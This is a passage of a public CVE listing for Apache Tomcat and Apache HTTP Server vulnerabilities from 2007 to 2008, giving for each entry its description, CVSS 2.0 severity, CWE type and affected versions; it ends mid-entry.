Multiple cross-site scripting (XSS) vulnerabilities in the appdev/sample/web/hello.jsp example application in Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.23, and 6.0.0 through 6.0.10 allow remote attackers to inject arbitrary web script or HTML via the test parameter and unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 5.0.2
apache tomcat 4.1.15
apache tomcat 5.0.22
apache tomcat 4.0.4
apache tomcat 5.0.5
apache tomcat 6.0.7
apache tomcat 5.0.14
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 5.0.16
apache tomcat 6.0.8
apache tomcat 4.0.3
apache tomcat 5.0.13
apache tomcat 4.1.24
apache tomcat 5.0.28
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 5.0.23
apache tomcat 4.0.1
apache tomcat 6.0.4
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 6.0.5
apache tomcat 5.0.7
apache tomcat 5.0.26
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 5.0.12
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat 5.0.9
apache tomcat 5.0.29
apache tomcat 5.0.25
apache tomcat 6.0.6
apache tomcat 5.0.10
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 4.0.6
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 6.0.0
apache tomcat 5.0.11
apache tomcat 5.0.18
apache tomcat 6.0.9
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 5.0.1
CVE-2007-1358 LOW

Cross-site scripting (XSS) vulnerability in certain applications using Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.34 allows remote attackers to inject arbitrary web script or HTML via crafted "Accept-Language headers that do not conform to RFC 2616".

CVSS 2.0

Severity: LOW

Problem Type: CWE-79

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 4.1.0
apache tomcat 4.0.0
apache tomcat 4.0.5
apache tomcat 4.0.1
apache tomcat 4.0.3
apache tomcat 4.0.2
apache tomcat 4.0.4
apache tomcat 4.0.6
CVE-2007-1742 LOW

suexec in Apache HTTP Server (httpd) 2.2.3 uses a partial comparison for verifying whether the current directory is within the document root, which might allow local users to perform unauthorized operations on incorrect directories, as demonstrated using "html_backup" and "htmleditor" under an "html" directory. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root."

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache http_server 2.2.3
CVE-2007-1743 MEDIUM

suexec in Apache HTTP Server (httpd) 2.2.3 does not verify combinations of user and group IDs on the command line, which might allow local users to leverage other vulnerabilities to create arbitrary UID/GID owned files if /proc is mounted. NOTE: the researcher, who is reliable, claims that the vendor disputes the issue because "the attacks described rely on an insecure server configuration" in which the user "has write access to the document root." In addition, because this is dependent on other vulnerabilities, perhaps this is resultant and should not be included in CVE.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache http_server 2.2.3
CVE-2007-1858 LOW

The default SSL cipher configuration in Apache Tomcat 4.1.28 through 4.1.31, 5.0.0 through 5.0.30, and 5.5.0 through 5.5.17 uses certain insecure ciphers, including the anonymous cipher, which allows remote attackers to obtain sensitive information or have other, unspecified impacts.

CVSS 2.0

Severity: LOW

Problem Type: NVD-CWE-Other

Products Affected

Vendor Product Version
apache tomcat 5.0.17
apache tomcat 5.0.2
apache tomcat 5.0.26
apache tomcat 5.5.12
apache tomcat 5.5.14
apache tomcat 4.1.28
apache tomcat 5.0.12
apache tomcat 4.1.31
apache tomcat 5.5.15
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat 5.0.22
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 5.0.14
apache tomcat 5.0.24
apache tomcat 5.0.16
apache tomcat 5.0.29
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.0.25
apache tomcat 5.5.0
apache tomcat 5.0.10
apache tomcat 5.0.13
apache tomcat 5.0.15
apache tomcat 5.0.28
apache tomcat 5.5.10
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 5.5.4
apache tomcat 5.5.9
apache tomcat 5.0.23
apache tomcat 5.5.2
apache tomcat 5.5.1
apache tomcat 5.0.11
apache tomcat 5.0.19
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 5.0.18
apache tomcat 5.0.0
apache tomcat 5.0.1
CVE-2007-1860 MEDIUM

mod_jk in Apache Tomcat JK Web Server Connector 1.2.x before 1.2.23 decodes request URLs within the Apache HTTP Server before passing the URL to Tomcat, which allows remote attackers to access protected pages via a crafted prefix JkMount, possibly involving double-encoded .. (dot dot) sequences and directory traversal, a related issue to CVE-2007-0450.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22

Products Affected

Vendor Product Version
apache tomcat_jk_web_server_connector *
CVE-2007-1862 MEDIUM

The recall_headers function in mod_mem_cache in Apache 2.2.4 does not properly copy all levels of header data, which can cause Apache to return HTTP headers containing previously used data, which could be used by remote attackers to obtain potentially sensitive information.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.2.4
CVE-2007-2449 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in certain JSP files in the examples web application in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote attackers to inject arbitrary web script or HTML via the portion of the URI after the ';' character, as demonstrated by a URI containing a "snp/snoop.jsp;" sequence.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 5.0.5
apache tomcat 6.0.7
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 4.0.3
apache tomcat 5.0.13
apache tomcat 6.0.12
apache tomcat 5.0.28
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 5.5.9
apache tomcat 5.0.23
apache tomcat 4.0.1
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 5.0.0
apache tomcat 6.0.5
apache tomcat 5.0.7
apache tomcat 5.5.22
apache tomcat 5.0.26
apache tomcat 5.5.12
apache tomcat 5.0.12
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat 6.0.13
apache tomcat *
apache tomcat 5.0.9
apache tomcat 5.0.29
apache tomcat 5.0.25
apache tomcat 6.0.6
apache tomcat 5.0.10
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 5.5.10
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 5.0.11
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.0.18
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 5.0.1
CVE-2007-2450 LOW

Multiple cross-site scripting (XSS) vulnerabilities in the (1) Manager and (2) Host Manager web applications in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0 through 4.1.36, 5.0.0 through 5.0.30, 5.5.0 through 5.5.24, and 6.0.0 through 6.0.13 allow remote authenticated users to inject arbitrary web script or HTML via a parameter name to manager/html/upload, and other unspecified vectors.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 5.0.5
apache tomcat 6.0.7
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 4.0.3
apache tomcat 5.0.13
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.0.28
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 5.5.9
apache tomcat 5.0.23
apache tomcat 4.0.1
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 5.0.0
apache tomcat 6.0.5
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 5.0.26
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 5.0.12
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat 6.0.13
apache tomcat 5.0.9
apache tomcat 5.0.29
apache tomcat 5.0.25
apache tomcat 6.0.6
apache tomcat 5.0.10
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 4.0.6
apache tomcat 5.5.10
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 4.1.0
apache tomcat 5.0.11
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.0.18
apache tomcat 6.0.9
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 5.0.1
CVE-2007-3304 MEDIUM

Apache httpd 1.3.37, 2.0.59, and 2.2.4 with the Prefork MPM module, allows local users to cause a denial of service by modifying the worker_score and process_score arrays to reference an arbitrary process ID, which is sent a SIGUSR1 signal from the master process, aka "SIGUSR1 killer."

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 6.06
redhat enterprise_linux_desktop 5.0
redhat enterprise_linux_workstation 5.0
fedoraproject fedora 7
redhat enterprise_linux_server 5.0
canonical ubuntu_linux 6.10
canonical ubuntu_linux 7.04
CVE-2007-3382 MEDIUM

Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 treats single quotes ("'") as delimiters in cookies, which might cause sensitive information such as session IDs to be leaked and allow remote attackers to conduct session hijacking attacks.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 4.1.2
apache tomcat 5.0.17
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 5.0.5
apache tomcat 6.0.7
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 3.3
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 5.0.13
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.0.28
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 5.5.9
apache tomcat 5.0.23
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 3.3.1a
apache tomcat 5.0.0
apache tomcat 6.0.5
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 3.3.2
apache tomcat 5.0.26
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 5.0.12
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat 6.0.13
apache tomcat 5.0.9
apache tomcat 5.0.29
apache tomcat 5.0.25
apache tomcat 6.0.6
apache tomcat 5.0.10
apache tomcat 5.0.15
apache tomcat 5.5.10
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 4.1.0
apache tomcat 5.0.11
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.0.18
apache tomcat 6.0.9
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 5.0.1
CVE-2007-3383 MEDIUM

Cross-site scripting (XSS) vulnerability in SendMailServlet in the examples web application (examples/jsp/mail/sendmail.jsp) in Apache Tomcat 4.0.0 through 4.0.6 and 4.1.0 through 4.1.36 allows remote attackers to inject arbitrary web script or HTML via the From field and possibly other fields, related to generation of error messages.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 4.0.0
apache tomcat 4.0.5
apache tomcat 4.1.28
apache tomcat 4.1.1
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 4.0.1
apache tomcat 4.1.15
apache tomcat 4.0.4
apache tomcat 4.1.0
apache tomcat 4.0.3
apache tomcat 4.1.36
apache tomcat 4.0.2
apache tomcat 4.1.3
apache tomcat 4.0.6
apache tomcat 4.1.24
CVE-2007-3385 MEDIUM

Apache Tomcat 6.0.0 to 6.0.13, 5.5.0 to 5.5.24, 5.0.0 to 5.0.30, 4.1.0 to 4.1.36, and 3.3 to 3.3.2 does not properly handle the \" character sequence in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 3.3.1
apache tomcat 4.1.2
apache tomcat 5.0.17
apache tomcat 5.0.2
apache tomcat 5.5.14
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 5.0.5
apache tomcat 6.0.7
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 3.3
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 5.0.13
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.0.28
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 5.5.9
apache tomcat 5.0.23
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 3.3.1a
apache tomcat 5.0.0
apache tomcat 6.0.5
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 3.3.2
apache tomcat 5.0.26
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 5.0.12
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.30
apache tomcat 5.0.21
apache tomcat 6.0.13
apache tomcat 5.0.9
apache tomcat 5.0.29
apache tomcat 5.0.25
apache tomcat 6.0.6
apache tomcat 5.0.10
apache tomcat 5.0.15
apache tomcat 5.5.10
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 4.1.0
apache tomcat 5.0.11
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 5.0.18
apache tomcat 6.0.9
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 5.0.1
CVE-2007-3847 MEDIUM

The date handling code in modules/proxy/proxy_util.c (mod_proxy) in Apache 2.3.0, when using a threaded MPM, allows remote origin servers to cause a denial of service (caching forward proxy process crash) via crafted date headers that trigger a buffer over-read.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-125,

Products Affected

Vendor Product Version
canonical ubuntu_linux 7.10
apache http_server *
canonical ubuntu_linux 6.06
fedoraproject fedora_core 6
fedoraproject fedora 7
canonical ubuntu_linux 6.10
canonical ubuntu_linux 7.04
CVE-2007-4465 MEDIUM

Cross-site scripting (XSS) vulnerability in mod_autoindex.c in the Apache HTTP Server before 2.2.6, when the charset on a server-generated page is not defined, allows remote attackers to inject arbitrary web script or HTML via the P parameter using the UTF-7 charset. NOTE: it could be argued that this issue is due to a design limitation of browsers that attempt to perform automatic content type detection.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server *
CVE-2007-5000 MEDIUM

Cross-site scripting (XSS) vulnerability in the (1) mod_imap module in the Apache HTTP Server 1.3.0 through 1.3.39 and 2.0.35 through 2.0.61 and the (2) mod_imagemap module in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
canonical ubuntu_linux 7.10
apache http_server *
fedoraproject fedora 7
suse linux_enterprise_server 9
canonical ubuntu_linux 6.10
opensuse opensuse 10.2
suse linux_enterprise_server 10
canonical ubuntu_linux 6.06
fedoraproject fedora 8
opensuse opensuse 10.3
suse linux_enterprise_desktop 9
canonical ubuntu_linux 7.04
oracle http_server 10.1.3.5.0
CVE-2007-5333 MEDIUM

Apache Tomcat 6.0.0 through 6.0.14, 5.5.0 through 5.5.25, and 4.1.0 through 4.1.36 does not properly handle (1) double quote (") characters or (2) %5C (encoded backslash) sequences in a cookie value, which might cause sensitive information such as session IDs to be leaked to remote attackers and enable session hijacking attacks. NOTE: this issue exists because of an incomplete fix for CVE-2007-3385.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2007-5342 MEDIUM

The default catalina.policy in the JULI logging component in Apache Tomcat 5.5.9 through 5.5.25 and 6.0.0 through 6.0.15 does not restrict certain permissions for web applications, which allows attackers to modify logging configuration options and overwrite arbitrary files, as demonstrated by changing the (1) level, (2) directory, and (3) prefix attributes in the org.apache.juli.FileHandler handler.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 5.5.12
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 6.0.13
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 6.0.6
apache tomcat 6.0.8
apache tomcat 6.0.12
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.20
apache tomcat 5.5.23
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 5.5.19
apache tomcat 6.0.2
apache tomcat 6.0.11
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 6.0.9
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 6.0.3
apache tomcat 5.5.22
apache tomcat 6.0.14
CVE-2007-5461 LOW

Absolute path traversal vulnerability in Apache Tomcat 4.0.0 through 4.0.6, 4.1.0, 5.0.0, 5.5.0 through 5.5.25, and 6.0.0 through 6.0.14, under certain configurations, allows remote authenticated users to read arbitrary files via a WebDAV write request that specifies an entity with a SYSTEM tag.

CVSS 2.0

Severity: LOW

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat 4.1.2
apache tomcat 4.1.16
apache tomcat 4.1.33
apache tomcat 4.0.0
apache tomcat 4.1.18
apache tomcat 4.1.5
apache tomcat 4.1.28
apache tomcat 4.1.29
apache tomcat 4.1.1
apache tomcat 4.1.10
apache tomcat 4.1.34
apache tomcat 4.1.31
apache tomcat 4.1.15
apache tomcat 4.0.4
apache tomcat 4.1.8
apache tomcat 4.1.21
apache tomcat 4.1.12
apache tomcat 4.1.17
apache tomcat 4.1.25
apache tomcat 4.1.4
apache tomcat 4.1.35
apache tomcat 4.1.13
apache tomcat 4.1.22
apache tomcat 4.0.3
apache tomcat 4.0.2
apache tomcat 4.0.6
apache tomcat 4.1.7
apache tomcat 4.1.24
apache tomcat 4.1.19
apache tomcat 4.1.11
apache tomcat 4.0.5
apache tomcat 4.1.27
apache tomcat 4.0.1
apache tomcat 4.1.9
apache tomcat 4.1.0
apache tomcat 4.1.20
apache tomcat 4.1.30
apache tomcat 4.1.26
apache tomcat 4.1.32
apache tomcat 4.1.23
apache tomcat 4.1.6
apache tomcat 4.1.14
apache tomcat 4.1.36
apache tomcat 4.1.3
CVE-2007-6286 MEDIUM

Apache Tomcat 5.5.11 through 5.5.25 and 6.0.0 through 6.0.15, when the native APR connector is used, does not properly handle an empty request to the SSL port, which allows remote attackers to trigger handling of "a duplicate copy of one of the recent requests," as demonstrated by using netcat to send the empty request.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache tomcat 5.5.12
apache tomcat 5.5.14
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 6.0.13
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 6.0.6
apache tomcat 6.0.8
apache tomcat 6.0.12
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.16
apache tomcat 6.0.15
apache tomcat 5.5.20
apache tomcat 5.5.23
apache tomcat 6.0.0
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 5.5.19
apache tomcat 6.0.2
apache tomcat 6.0.11
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 6.0.9
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 6.0.3
apache tomcat 5.5.22
apache tomcat 6.0.14
CVE-2007-6388 MEDIUM

Cross-site scripting (XSS) vulnerability in mod_status in the Apache HTTP Server 2.2.0 through 2.2.6, 2.0.35 through 2.0.61, and 1.3.2 through 1.3.39, when the server-status page is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server *
CVE-2007-6420 MEDIUM

Cross-site request forgery (CSRF) vulnerability in the balancer-manager in mod_proxy_balancer for Apache HTTP Server 2.2.x allows remote attackers to gain privileges via unspecified vectors.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache http_server 2.2.2
apache http_server 2.2.6
apache http_server -
apache http_server 2.2.0
apache http_server 2.2.3
apache http_server 2.2.4
CVE-2007-6421 LOW

Cross-site scripting (XSS) vulnerability in balancer-manager in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6 allows remote attackers to inject arbitrary web script or HTML via the (1) ss, (2) wr, or (3) rr parameters, or (4) the URL.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache http_server 2.2.2
apache http_server 2.2.6
apache http_server -
apache http_server 2.2.1
apache http_server 2.2.3
apache http_server 2.2.4
apache http_server 2.2
CVE-2007-6422 MEDIUM

The balancer_handler function in mod_proxy_balancer in the Apache HTTP Server 2.2.0 through 2.2.6, when a threaded Multi-Processing Module is used, allows remote authenticated users to cause a denial of service (child process crash) via an invalid bb variable.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache http_server 2.2.2
apache http_server 2.2.6
apache http_server -
apache http_server 2.2.1
apache http_server 2.2.3
apache http_server 2.2.4
apache http_server 2.2
CVE-2007-6423 HIGH

Unspecified vulnerability in mod_proxy_balancer for Apache HTTP Server 2.2.x before 2.2.7-dev, when running on Windows, allows remote attackers to trigger memory corruption via a long URL. NOTE: the vendor could not reproduce this issue.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache http_server 2.2.2
apache http_server 2.2.6
apache http_server -
apache http_server 2.2.3
apache http_server 2.2.4
CVE-2007-6750 MEDIUM

The Apache HTTP Server 1.x and 2.x allows remote attackers to cause a denial of service (daemon outage) via partial HTTP requests, as demonstrated by Slowloris, related to the lack of the mod_reqtimeout module in versions before 2.2.15.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-399,

Products Affected

Vendor Product Version
apache http_server 1.0.2
apache http_server 2.1.4
apache http_server 2.1.9
apache http_server 2.2.1
apache http_server 1.3.14
apache http_server 1.3.34
apache http_server 1.1.1
apache http_server 2.2.0
apache http_server 2.0.44
apache http_server 1.3.27
apache http_server 2.2.12
apache http_server 2.0.47
apache http_server 1.3.24
apache http_server 1.3.9
apache http_server 2.0.40
apache http_server 1.3.68
apache http_server 1.3.1.1
apache http_server 2.2.13
apache http_server 1.3.65
apache http_server 2.0.35
apache http_server 2.2.8
apache http_server 1.3.2
apache http_server 1.3.0
apache http_server 2.0.45
apache http_server 1.3.18
apache http_server 2.0.51
apache http_server 1.3.38
apache http_server 2.0.37
apache http_server 2.2.10
apache http_server *
apache http_server 2.1
apache http_server 1.3.33
apache http_server 2.0
apache http_server 2.2.2
apache http_server 1.3.39
apache http_server 2.0.53
apache http_server 2.1.8
apache http_server 2.1.7
apache http_server 2.2.6
apache http_server 2.0.43
apache http_server 1.0
apache http_server 1.3.25
apache http_server 2.0.38
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 2.0.57
apache http_server 1.3.6
apache http_server 1.3.32
apache http_server 1.2
apache http_server 1.3.28
apache http_server 1.3.13
apache http_server 2.0.50
apache http_server 2.0.56
apache http_server 2.1.5
apache http_server 2.0.28
apache http_server 1.3.42
apache http_server 1.3.19
apache http_server 1.3.5
apache http_server 1.0.5
apache http_server 2.0.61
apache http_server 1.3.4
apache http_server 2.2.4
apache http_server 2.2.11
apache http_server 2.0.36
apache http_server 2.2
apache http_server 1.1
apache http_server 1.3.10
apache http_server 2.1.1
apache http_server 1.3.29
apache http_server 1.3.16
apache http_server 2.1.6
apache http_server 1.3.36
apache http_server 1.2.6
apache http_server 1.3.23
apache http_server 1.3.31
apache http_server 2.0.32
apache http_server 1.3.30
apache http_server 1.3.1
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 1.99
apache http_server 2.0.46
apache http_server 1.3.7
apache http_server 1.3.12
apache http_server 2.0.59
apache http_server 1.3.41
apache http_server 1.3.20
apache http_server 2.2.3
apache http_server 1.4.0
apache http_server 1.2.9
apache http_server 2.0.52
apache http_server 2.0.39
apache http_server 2.2.9
apache http_server 1.3.22
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.0.58
apache http_server 1.3.15
apache http_server 2.0.42
apache http_server 1.3.11
apache http_server 2.0.55
apache http_server 1.3.35
apache http_server 2.0.63
apache http_server 2.1.2
apache http_server 1.0.3
apache http_server 1.3
apache http_server 2.0.60
apache http_server 1.3.37
apache http_server 1.3.8
apache http_server 1.2.4
apache http_server 2.0.54
apache http_server 1.2.5
apache http_server 2.0.34
apache http_server 2.1.3
apache http_server 1.3.3
CVE-2008-0005 MEDIUM

mod_proxy_ftp in Apache 2.2.x before 2.2.7-dev, 2.0.x before 2.0.62-dev, and 1.3.x before 1.3.40-dev does not define a charset, which allows remote attackers to conduct cross-site scripting (XSS) attacks using UTF-7 encoding.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
canonical ubuntu_linux 7.10
apache http_server *
canonical ubuntu_linux 6.06
fedoraproject fedora 8
fedoraproject fedora 7
canonical ubuntu_linux 6.10
canonical ubuntu_linux 7.04
CVE-2008-0128 MEDIUM

The SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) in Apache Tomcat before 5.5.21 does not set the secure flag for the JSESSIONIDSSO cookie in an https session, which can cause the cookie to be sent in http requests and make it easier for remote attackers to capture this cookie.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-16,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2008-0455 MEDIUM

